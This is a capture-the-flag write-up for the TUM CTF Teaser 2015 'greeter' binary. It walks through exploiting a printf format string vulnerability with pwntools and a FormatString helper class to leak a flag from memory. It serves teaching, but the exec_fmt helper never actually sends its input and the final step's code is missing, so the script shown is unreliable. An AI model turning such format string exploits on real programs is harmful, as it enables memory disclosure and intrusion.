TUM CTF Teaser 2015: greeter


Another example of a basic format string vulnerability. In this case, the flag was read into memory and your input was printf’d back at you. The goal being to use that printf to read the flag from memory.


$ ./greeter
Hi, what's your name?
Pwn harder, 8d74e440!

The Vulnerability

As previously mentioned, we have a format string vulnerability, and we know that the flag was read into memory prior to our format string being executed. The easy method is to simply print it out as a string.

Step 1: exec_fmt

The first step in using the FormatString class is to create an exec_fmt function. This function will take in any arbitrary input, pass that input into the application properly, parse the results and return the results back. At this point, we’re not worried about exploiting the vulnerability, we’re simply interacting with the program.

def exec_fmt(s):
    p = process(fName,buffer_fill_size=0xffff)
    p.recvuntil("Pwn harder, ",drop=True)
    return p.recvall()

That’ll do. That’s the majority of your work right there.

Step 2: Instantiate Class

Next, we need to instantiate a FormatString class. This can be done strait forward. To make it simpler, we’ll also open an ELF class on the exe.

from formatStringExploiter.FormatString import FormatString
from pwn import *

# Load the binary in pwntools. This way we don't need to worry about the
# details, just pass it to FormatString
elf = ELF("./greeter")

# Now, instantiate a FormatString class, using the elf and exec_fmt functions
fmtStr = FormatString(exec_fmt,elf=elf)

You will see some data scroll. This is the FormatString class attempting to discover your buffer for you. Finally, you’ll see something like this:

Found the offset to our input! Index = 6, Pad = 0

Good to go now. It has found the buffer, we can simply ask the class to perform actions for us now.

Step 3: Read Flag As String

Now that it’s all set up, simply ask FormatString to give you this variable as a string.


That’s it. Your flag is printed. If this were the CTF, you could change process to remote and run it again to grab the flag.